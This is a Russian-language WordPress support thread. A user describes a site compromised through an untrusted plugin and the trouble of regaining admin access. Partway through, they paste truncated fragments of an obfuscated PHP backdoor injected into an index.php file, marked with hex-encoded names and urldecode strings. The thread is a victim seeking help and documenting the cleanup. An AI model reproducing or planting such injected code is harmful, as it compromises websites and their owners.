Ответы в темах

Просмотр 4 ответов — с 1 по 4 (всего 4)
  • С проблемой разобрался.
    сайт был взломан через плагин из непроверенного источника.
    Был установлен доп плагин, который шифровал index.php админки и другие файлы, блокировал пользователя admin для внесения каких либо изменений.

    Вариант лечения, скачать все файлы на локальном сервере чистить от вредоносного кода.

    Спасибо всем кто откликнулся. 🤝

    Привет m0ze,

    Я хочу получить доступ к своим данным и сохранить статьи блога.
    Получить права admin

    Подумал раз проблемы с правами доступа, то уж на локальном сервере я смогу до них добраться.
    А еще решил не экспериментировать на работающем сайте. Изменить я на нем ничего не могу, но он хотя бы работает.

    >Очевидно, проблема с правами доступа к файлам и директориям.
    Посмотрел на права директории wp_admin 755
    файлы внутри 644
    У всех директорий и файлов таки права
    кроме public_html\index.php у него 444

    m0ze, вы оказываете платные консультации?

    Скачал сайт на локальный сервер (open server)
    Импортировал бд с сайта в локальную бд
    внес изменения в таблицу wp_options.php
    -поменял URL

    внес изменения в файл wp_config.php
    -Имя базы данных для WordPress
    -Имя пользователя базы данных root
    -пустой пароль бд
    таблице wp-users
    -поменял пароль у админа (свойство поля md5 ставил)

    В админку я теперь захожу, но в ней только текстовая версия без оформления, и у меня нет прав доступа что либо изменить.
    пишет

    >Доступ запрещён!
    >У Вас нет прав доступа к этому объекту. Файл недоступен для чтения, или сервер не >может его прочитать.
    >Error 403

    плагины отключал
    темы отключал
    и то и другое вместе отключал не помогло
    .htaccess отключал, заменял на новый от wordpress 6 версии

    Что делать, куда копать?

    • Ответ изменён 1 год, 11 месяцев назад пользователем std31.
    • Ответ изменён 1 год, 11 месяцев назад пользователем std31.
    • Ответ изменён 1 год, 11 месяцев назад пользователем std31.

    Сергей, Спасибо за рекомендации

    Скачал wordpress 6 с оф сайта, распаковал и взял из папки ..\wp-admin\index.php и заменил его на сервере. И обнаружил, что содержимое файла превратилось вот в это

    <?php
    $OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%7
    
    ТУТ ДОВОЛЬНО МНОГО ЭТОЙ ФИГНИ 
    
    ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x4f\x30"]($O_00__O0OO);die();}$O00_O_OO0_=OOO0O_0_0_($O_00__O0OO);if($O00_O_OO0_!==false){foreach($O00_O_OO0_["\x68\x65\x61\x64\x65\x72\x73"] as $OO0_O_O00_){@header($OO0_O_O00_);}echo $O00_O_OO0_["\x64\x61\x74\x61"];die();}}OO00O0O___($O0O_0_O0_O);
    ?>
    <?php
    define( 'WP_USE_THEMES', true );
    require __DIR__ . '/wp-blog-header.php';

    Так ведь не должно быть?
    Наверное буду следовать совету из статьи если вас взломали.

    • Ответ изменён 1 год, 11 месяцев назад пользователем std31.
    • Ответ изменён 1 год, 11 месяцев назад пользователем std31.
Просмотр 4 ответов — с 1 по 4 (всего 4)